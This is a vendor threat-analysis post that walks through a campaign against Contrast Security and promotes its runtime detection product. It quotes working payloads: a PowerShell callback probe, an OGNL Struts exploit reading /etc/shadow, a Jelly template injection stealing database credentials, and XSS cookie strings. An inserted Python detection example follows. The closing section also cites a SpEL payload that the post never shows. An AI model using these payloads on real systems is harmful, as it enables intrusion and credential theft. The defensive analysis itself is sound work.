
48-Hour Case Study: Analyzing Coordinated Attacks from Mumbai, India

Over one weekend, Contrast detected 87 coordinated attacks originating from infrastructure in Mumbai, India that targeted the dangerous blind spot between perimeter defenses and application runtimes. This type of complex attack is why organizations use Contrast Application Detection and Response. This campaign, launched on October 18th and 19th, is a textbook demonstration of the sophisticated, multi-vector TTPs used by modern adversaries who understand how to exploit the problem in most organizations: there is no real-time visibility into runtime application attacks and no ability to stop them.

This was not a theoretical test or customer incident; the attacks targeted Contrast itself. Because we saw the full attack chain firsthand, we can show exactly how ADR detects, interprets, and blocks what others miss.

Contrast Labs has put together this analysis of the observed attack progression - from initial reconnaissance and shell command execution to framework-specific RCE and credential harvesting - as a critical case study for defense teams. Read on for a phase-by-phase reconstruction showing how these attackers weaponized obfuscation and in-process execution to evade WAFs and EDRs, and the runtime signals that flagged them.

Note: This article has been updated to reflect new information.

Phase 1: Initial reconnaissance and OS command injection

The campaign began on Saturday with a probe on Contrast Security infrastructure via HTTP GET. The command is designed to confirm a Remote Code Execution (RCE) vulnerability using the system-level utility Windows PowerShell.

Payload:

$(powershell -c iwr -uri http://[redacted])


The core command, iwr -uri [redacted], forces the target server to quietly reach out to an external domain controlled by the attacker. By checking for the unique-id identifier within that outbound connection, an attacker can confirm both the host and RCE vulnerability are active, clearing the way for a more damaging follow-up attack. 

  • MITRE ATT&CK tactics: Initial Access (T1190), Reconnaissance (TA0043), Vulnerability Scanning (T1595.002)
  • Procedure: Command and Scripting Interpreter (T1059.001) via PowerShell's Invoke-WebRequest (iwr) cmdlet. The execution does not return data; its success is passively logged by an external listener.
  • SOC blind spot: For applications protected only by traditional security tools, this execution often proceeds undetected. The request can bypass WAF inspection due to parameter placement or, if executed, is viewed by network and endpoint security as the application itself performing a legitimate outbound HTTP request, providing no visibility into the malicious payload executed at the application layer.

Phase 2: Pivot to application-specific probing

That same day, seeing that their Windows PowerShell probe failed to return a positive signal, the attacker immediately shifted focus to application-specific vectors, moving from OS Command Injection to highly specific attack attempts aimed at discovering and exploiting vulnerabilities within common Java application frameworks.

This rapid pivot demonstrates the attacker’s broad reconnaissance capabilities and immediate understanding that the application layer itself, rather than the host, is a viable target. The subsequent attacks are not an escalation following RCE confirmation, but rather two additional, more refined attempts to achieve RCE by targeting the application's Java expression interpreters.

These framework-specific payloads are often highly obfuscated (e.g., double URL-encoded) specifically to defeat static WAF signatures. If a WAF fails to recognize the obfuscated input, the payload is delivered to the application runtime, where the malicious expression executes as native application code.

Attack attempt #1: Struts 2 RCE exploitation (OGNL injection)

The attacker first attempts a chained OGNL (Object-Graph Navigation Language) injection attack. This is a critical probe for achieving persistent, platform-independent RCE within the JVM.

Payload excerpt:

(#_memberAccess=@ognl.OgnlContext@
DEFAULT_MEMBER_ACCESS)?
(#wr=#context[#parameters.obj[0]].
getWriter(),#wr.println(#parameters.content[0])
,#wr.flush(),#wr.close()):xx.toString.json

{(#instancemanager=#application
["org.apache.tomcat.InstanceManager"]).
(#stack=#attr
["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).
(#bean=#instancemanager.newInstance
("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).
(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("cat /etc/shadow")).(#execute=#instancemanager.newInstance
("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}


  • MITRE ATT&CK tactic: Execution (TA0002) and Defense Evasion (TA0005).
  • Procedure: The payload attempts to gain control over the JVM by navigating the Struts ValueStack. Specifically, it uses the Struts ValueStack and BeanMap utilities to locate and clear the security blacklists (excludedClasses, excludedPackageNames) on the MemberAccess object. This Defense Evasion step is a prerequisite for the final action: creating and invoking an instance of a utility such as freemarker.template.utility.Execute, which is capable of running system shell commands. The argument list (#arglist) contains the command cat /etc/shadow. The /etc/shadow file on Linux/Unix systems contains the hashed passwords for local users, so successfully executing this command lets the attacker steal those hashes directly from the filesystem.
  • SOC blind spot: If this payload successfully reaches the application, the malicious expression executes entirely within the application's runtime. Traditional monitoring tools only observe the incoming HTTP request. They cannot see the OGNL interpreter executing code, nor can they see the internal Java classes being modified to bypass security controls. The SOC team receives zero contextual visibility of this security-control bypass.

Attack attempt #2: RCE via server-side template injection

This payload is an attempt at Remote Code Execution (RCE) using a Server-Side Template Injection (SSTI) technique to steal database credentials. It specifically targets applications that process Jelly or Glide templating tags.

Payload:

jvar_page_title=<style><j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>z=new Packages.java.io.File('').getAbsolutePath();z=z.substring
(0,z.lastIndexOf('/'));u=new SecurelyAccess(z.concat('/co..nf/glide.db.properties')).
getBufferedReader();s='';while((q=u.readLine())!==null)
s=s.concat(q,'\n');
gs.addErrorMessage(s);</g:evaluate></j:jelly></style>


  • MITRE ATT&CK tactic: Data Exfiltration over Other Network Medium (T1011)
  • Procedure: The payload utilizes <g:evaluate> tags to execute script that performs directory traversal to locate and read the highly sensitive glide.db.properties file. The ultimate action is to print the database credentials into an application error message (gs.addErrorMessage(s)), achieving Data Exfiltration via the HTTP response body.
  • SOC blind spot: If successful, this attack reads sensitive file content entirely within the Java application process. The SOC team would only see a seemingly routine application error message returned to the client. They would have no visibility into the internal file system access, the credential-reading event, or the deliberate manipulation of the error handler to exfiltrate data, as these actions never leave the application layer for host- or network-based monitoring to detect.

Phase 3: Client-side attack (XSS)

A final attack vector included attempts at Cross-Site Scripting (XSS). While unsuccessful, this attack shows that the adversary was performing exhaustive reconnaissance to map out both server-side and client-side injection points, demonstrating readiness to pivot to user compromise (e.g., session hijacking or credential theft) should server-side RCE attempts fail.

Payload examples:

message=%3Cscript%3Ealert(%22153000-document.cookie%22)%3C/script%3E

%27%3bqxss(document.cookie)%3b%27


  • MITRE ATT&CK tactic: Command and Scripting Interpreter: JavaScript (T1059.007)
  • Procedure: The injection aims to execute arbitrary JavaScript within a victim's browser, enabling session hijacking, credential theft, or content defacement. This attack shifts the focus from the server to the client but maintains the same principle of injecting and executing code that is not part of the legitimate application. The attacker submits this payload, hoping the server will reflect the content of the message parameter directly back to the user's browser without properly sanitizing or encoding the HTML output.
  • SOC blind spot: If the client-side attack is successful, the attack's consequences occur outside the server and network perimeter, and thus, outside of the SOC’s view. The subsequent critical actions, such as the injected JavaScript stealing a user's session cookie, capturing credentials via keystroke logging, or redirecting the user, all take place within the victim's web browser. Therefore, the SOC has no record of the payload executing, the data being compromised, or the severity of the user-side impact.
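Tying the three phases together, the following Python is an added example written for this analysis (not Contrast's code and not part of the original post). It models the obfuscation problem from Phase 2: a filter that URL-decodes once and then matches signatures sees nothing, while decoding to a fixed point (what the interpreter will ultimately see) surfaces the indicators. The indicator names, the normalize helper, and the sample parameters (constructed to resemble this post's payload classes) are all assumptions of the example.

```python
import re
from urllib.parse import quote, unquote

# Behavioural indicators for the payload classes in this case study. Each
# pattern deliberately includes the punctuation the interpreter needs, which
# is exactly what URL encoding hides from a single-pass signature check.
INDICATORS = {
    "ognl_sandbox_tamper": re.compile(
        r"#_memberAccess\s*=|\.put\(\s*['\"]excluded(?:Classes|PackageNames)['\"]"),
    "template_evaluate": re.compile(r"<g:evaluate\b|<j:jelly\b", re.I),
    "os_command_probe": re.compile(r"\$\(\s*(?:powershell|cmd|sh|bash)\b", re.I),
    "reflected_script": re.compile(r"<script\b", re.I),
}

def normalize(value, max_rounds=5):
    """URL-decode until the value stops changing; return (decoded, rounds).
    Bounded so a value that legitimately contains '%25' cannot loop forever."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def classify(text):
    """Names of every indicator that matches the (already decoded) text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def inspect_single_pass(param):
    """Models a perimeter filter that decodes once, then matches signatures."""
    return classify(unquote(param))

def inspect_normalized(param):
    """Decodes to a fixed point first, i.e. what the interpreter will see."""
    decoded, _ = normalize(param)
    return classify(decoded)

def double_encode(plain):
    """Encode twice, as the attacker does to slip past a single-decode filter."""
    return quote(quote(plain, safe=""), safe="")

# Constructed samples modelled on this post's payload classes (not the originals).
SAMPLES = {
    "ognl": '(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).'
            '(#bean.put("excludedClasses",#emptyset))',
    "jelly": "<j:jelly xmlns:j=\"jelly:core\" xmlns:g='glide'><g:evaluate>1+1</g:evaluate></j:jelly>",
    "probe": "$(powershell -c iwr -uri http://[redacted])",
    "xss": '<script>alert("document.cookie")</script>',
    "benign": "hello world 100%",
}

if __name__ == "__main__":
    for name, plain in SAMPLES.items():
        wire = double_encode(plain)
        print(f"{name:7} single-pass={inspect_single_pass(wire)} normalized={inspect_normalized(wire)}")
```

Running it shows every double-encoded attack sample classified as empty by the single-pass check and correctly named after normalization, while the benign parameter stays clean in both.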

How Contrast closes the blind spot

Attacks like these hinge on the following common security weaknesses:

  1. Weak perimeter defenses: Polymorphic, encoded payloads easily bypass the static, signature-based rules of traditional perimeter defenses (e.g., a WAF).
  2. Payload execution blindness (No runtime context): If payloads execute, traditional security tools have no way to inspect the internal actions (e.g., the OGNL changing Java security policies or the SpEL script reading a database file).
  3. Delayed detection and response (High dwell time): Since the attack is executed within the application process, security operations teams may experience long dwell times and rely on fragmented logs, crippling their ability to triage and respond in real-time.

Contrast’s Application Detection & Response (ADR) closes this blind spot by instrumenting the application from within. ADR sensors observe application behavior in real-time, providing runtime visibility to immediately detect and block malicious execution.

Contrast ADR is effective because it:

  • Detects behavior, not signatures: It recognizes the act of an OGNL expression attempting to clear security policies or a file-reading function being called by an injected script, regardless of the payload's encoding or obfuscation.
  • Provides real-time protection: Attacks like Struts OGNL Injection and SpEL Injection are detected and blocked instantly at runtime, preventing the malicious code from completing its operation.
  • Eliminates blind spots: Security teams gain full context of an application’s entire environment: the attacker's IP, the vulnerable line of code, the full payload, and the executed stack trace, enabling rapid response and informed remediation for both security and development teams.

Traditional defenses, like Web Application Firewalls (WAF) and Endpoint Detection & Response (EDR), routinely fail to maintain runtime visibility, leaving a critical blind spot at the application layer. By shifting defense from the vulnerable perimeter to the code itself, Contrast ADR neutralizes these sophisticated attacks. ADR sensors provide the contextual, code-level insight necessary to detect and block malicious execution instantly, transforming the defender's posture from reactive perimeter management to active, in-application protection.

Naomi Buckwalter

Naomi Buckwalter, CISSP CISM, is the Senior Director of Product Security for Contrast Security and author of the LinkedIn course: “Training today for tomorrow’s solutions – Building the Next Generation of Cybersecurity Professionals”. She has over 20 years’ experience in IT and Security and has held roles in Software Engineering, Security Architecture, Security Engineering, and Security Executive Leadership. A dynamic speaker and mentor, her passion is to cultivate the next generation of cybersecurity leaders through education and mentorship. Naomi has two Masters degrees from Villanova University and a Bachelors of Engineering from Stevens Institute of Technology.
